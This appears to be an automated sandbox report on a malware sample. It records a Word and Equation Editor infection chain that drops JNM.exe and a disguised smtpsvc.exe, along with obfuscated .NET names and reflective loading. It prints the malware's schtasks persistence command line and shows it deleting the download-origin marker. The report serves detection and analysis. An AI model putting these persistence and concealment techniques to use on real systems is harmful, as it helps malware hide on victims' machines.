Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C3E8 push esp; iretd		7_2_0044C551
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_006F234F push 00000000h; iretd		7_2_006F235C

.NET source code contains many randomly named methods

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\JNM.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\JNM.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Roaming\JNM.exe

File opened: C:\Users\user\AppData\Roaming\JNM.exe:Zone.Identifier read attributes | delete

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
